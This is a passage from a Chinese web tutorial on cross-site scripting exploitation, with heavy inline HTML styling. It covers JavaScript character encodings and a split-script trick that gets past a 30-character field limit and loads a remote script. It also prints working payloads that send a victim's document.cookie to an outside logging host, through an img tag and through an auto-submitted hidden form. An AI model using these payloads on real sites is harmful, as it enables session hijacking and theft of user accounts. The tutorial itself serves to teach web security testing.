68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">Javascript编码</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">js提供了 3 种字符编码的策略:</p><section style="margin: 0px; padding: 0px; max-width: 100%; font-size: 16px; font-family: 宋体; color: rgb(0, 0, 0); text-align: start; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 13px; font-family: Symbol; color: rgb(51, 51, 51);">·<span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; font-size: 9px; line-height: normal;">&nbsp;&nbsp;</span></span><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(51, 51, 51);">jsunicode编码,例如“e”编码为“\u0065”</span></span></section><section style="margin: 0px; padding: 0px; max-width: 100%; font-size: 16px; font-family: 宋体; color: rgb(0, 0, 0); text-align: start; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-family: Symbol; color: rgb(51, 51, 51);">·<span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; line-height: normal;">&nbsp;&nbsp;</span></span><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(51, 51, 51);">js十六进制,例如“e”编码为“\x65”</span></span></section><section style="margin: 0px; padding: 0px; max-width: 100%; font-size: 16px; font-family: 宋体; color: rgb(0, 0, 0); text-align: start; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;"><span style="margin: 0px; padding: 0px; max-width: 100%; font-family: Symbol; color: rgb(51, 51, 51); box-sizing: border-box !important; overflow-wrap: break-word !important;">·<span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; line-height: normal;">&nbsp;&nbsp;</span></span><span style="margin: 0px; padding: 0px; max-width: 100%; color: rgb(51, 51, 51); box-sizing: border-box !important; overflow-wrap: break-word !important;">js八进制,例如“e”编码为“\145”</span></span></section><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.4</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">跨站拆分法</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">安全研究员“剑心”发现某个网站存在XSS漏洞,漏洞出现在评论的联系方式处,但是,这处只能写入30个字符长度,必须的<script></script>就占用了17个字符,剩下的只有13个字符可以支配,如此一来,这个XSS只能用来弹出一个警告框。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">幸运的是,网站评论处可以重复留言,也就是说可以提交多个脚本标记,于是‘剑心’就巧妙的构造出以下XSS利用代码。</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><script>z=’document.write’</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=Z+’write(” ‘</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+’<script>’</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+’ src=ht’</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+’tp://ww’</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+’w.shell’</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+’.net/1.’</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+’js></sc’</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+’ript’</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>eval(z)</script></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">上述代码的作用是引入一个字符串变量Z,并且将下面的代码拆分开来。</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 0.5px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">document.write(&#39;<scrip>&nbsp; src=//www.shell.net/1.js></scrip>&#39;)</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">然后分几次将其嵌入到变量Z中,最后通过 eval(z) 巧妙地执行代码。</p></section><p></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H30Ic.png" title="XSS漏洞挖掘之跨站脚本攻击(图1)" alt="XSS漏洞挖掘之跨站脚本攻击(图1)"/></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H324F4.png" title="XSS漏洞挖掘之跨站脚本攻击(图2)" alt="XSS漏洞挖掘之跨站脚本攻击(图2)"/></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H340495.png" title="XSS漏洞挖掘之跨站脚本攻击(图3)" alt="XSS漏洞挖掘之跨站脚本攻击(图3)"/></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 0.5px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2 发送Cookie</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.1 利用img标签(最常用)</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">只需将alert(1)替换为以下Payload:</p><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 577.778px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">var img=document.createElement("img"); //创建一个img元素节点</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">img.src="http://www.nsf-test-xss.com/log?cookie="+escape(document.cookie); //设置src属性</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">document.body.appendChild(img); //添加到body节点下</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; line-height: 2; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.2 使用form表单</strong></p></section><p></p><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><form id="x" action="http://www.nsf-test-xss.com/log"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><input id="i" type="hidden" value="" name="y" /><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></form><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>var a = escape(document.cookie)<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.getElementById("i").value=a; //读取cookie并填入value<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.getElementById("x").submit();&nbsp; //提交表单<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></script></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 0.5px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">可以看到,页面跳转到了攻击者的网站,这对攻击者来说显然是很不友好的。</p></section><p></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H403459.png" title="XSS漏洞挖掘之跨站脚本攻击(图4)" alt="XSS漏洞挖掘之跨站脚本攻击(图4)"/></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.3 使用Ajax发送</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">Ajax的全称是Asynchronous JavaScript and XML(异步的 JavaScript 和 XML)。Ajax并不是一门新的语言,使用现有的JS语法。简单地讲,Ajax是高配版的JS form。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">由于Ajax可以在不重载整个页面的情况下,对网页的某些部分进行更新。并且Ajax可以在后台传输数据,而对前台没有影响。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">XMLHttpRequest是一个浏览器接口,使得Javascript可以进行HTTP(S)通信。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p><table cellspacing="0" cellpadding="0" width="676"><thead style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><tr style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;" class="firstRow"><td width="106" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important; border-width: 1px;"><br/></td><td width="225.66666666666666" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-style: solid; border-color: gainsboro; border-width: 1px; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; text-align: center; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 12px;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">IE</strong></span></p></td><td width="166.00000000000003" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-style: solid; border-color: gainsboro; border-width: 1px; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; text-align: center; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Chrome</strong></p></td></tr></thead><tbody style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><tr style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><td width="106" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 12px;">同域请求</span></p></td><td width="225.66666666666666" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 12px;">ActiveXObject("Microsoft.XMLHTTP") ActiveXObject("MSXML2.XMLHTTP")</span></p></td><td width="166.00000000000003" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;">XMLHttpRequest</p></td></tr><tr style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><td width="106" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 12px;">跨域请求</span></p></td><td width="225.66666666666666" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 12px;">XDomainRequest</span></p></td><td width="166.00000000000003" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;">XMLHttpRequest</p></td></tr></tbody></table><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p></section><p></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">之前的web页面都是传递整个页面结果,导致浪费了大量的网络宽带。使用了Ajax技术之后,客户端只向服务器传输更新过的内容,借助于客户端的javascript处理服务器的响应。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"/></p></section><p></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H42VS.png" title="XSS漏洞挖掘之跨站脚本攻击(图5)" alt="XSS漏洞挖掘之跨站脚本攻击(图5)"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">事先把XMLHttpTrquest对象写在一个子程序汇总。数据在服务器URL后面,用“?”字符分割,问号后面的数据会被解析成键值。发送数据的MIME类型通常是 application/x-www-for-urlencode 使用XMLHttpRequest的优势,就是可以从服务器读取不同形式的文本数据,包括XML。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.4 限制输入长度</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">对比上面三种传递方式,发现第二种的代码长度是最长的,这也是才构造了一个form表单,可想而知,若要构造出一个完整的页面进行钓鱼攻击,代码长度势必是不会短的。不仅仅是钓鱼,利用XSS获取用户页面信息、Web蠕虫等特殊情况下代码长度肯定也是很长的。然而实际环境下,很多情况服务端都会限制客户端的输入字符长度。</p><p style="margin-top: 0px; 